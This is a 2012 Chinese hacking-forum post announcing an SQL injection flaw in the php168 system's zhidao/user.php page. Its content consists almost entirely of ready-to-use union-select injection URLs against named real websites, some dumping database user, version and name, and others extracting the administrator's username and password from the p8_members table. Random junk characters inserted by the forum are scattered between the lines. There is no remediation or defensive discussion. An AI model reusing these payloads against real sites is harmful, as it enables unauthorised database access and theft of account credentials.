找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2968|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
" m# c2 [, D& E+ \                                                         6 B. c" T- U5 T2 ~
                                       6 z7 Q1 L$ L* v7 y
0 k) k5 M: ^0 j+ l& x
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--. R( ?" K7 m* k* _& W
                                                     
  Y( g% n, }: d( a8 I) S8 ~7 l                                                                  
0 R3 T# @4 M4 t% ^2 w                                                        
4 K* p% \* u% i# v! {8 Jhttp://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
/ q2 L/ @8 P4 v/ G6 c8 U- s" Y
& K1 v1 B1 d) [* Z9 n3 s6 y* o$ f& \9 V5 O
( E( b+ T, r! a/ H$ A# K7 b. H* V3 h
                                                            ) `- Z  s/ U' t2 f9 C
' P$ ^0 ]& @- b0 ^
http://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
/ d" z; _/ \  a! ~9 `7 K# h* o
: {3 E: z2 e( y* C" w( F. H
* P' l$ q* C( u, R$ u9 N; d( {& U/ z3 P* U$ W
                                                                    % q/ l6 J5 t+ g/ G

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表